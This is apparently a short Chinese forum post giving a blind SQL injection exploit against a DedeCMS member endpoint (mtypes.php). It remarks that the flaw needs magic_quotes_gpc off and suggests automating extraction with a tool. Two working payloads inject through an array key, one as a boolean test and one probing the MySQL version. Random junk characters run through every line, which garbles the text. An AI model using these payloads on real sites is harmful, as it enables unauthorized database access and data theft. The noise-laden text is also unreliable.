需要magic_quotes_gpc = Off,所以说是鸡肋啊.% A; X- ~" g6 P+ f
! p. T( z+ B0 D" v4 O- R8 @8 N $ d# u( M8 d8 }7 D4 ^& i
发生在数组key里的注射漏洞,有点意思.
' a; K( S T3 l0 P2 Q) o# ?* n
& p5 z n, s$ Q' `+ W这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下. V) ]3 Q; a# x: F1 S
- E$ l! V7 S; V
http://www.xxx.com /dede/member/mtypes.php?dopost=save
# F: V6 @" E$ B; K$ T7 o0 d- a
7 S% L; S+ Y1 Z5 ~ |# Xexploit:
' b9 Y% K$ A$ ?mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r5 [+ q0 g+ @4 d: w
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r0 M) [0 B# g0 R+ w4 m0 J* H( z$ `
|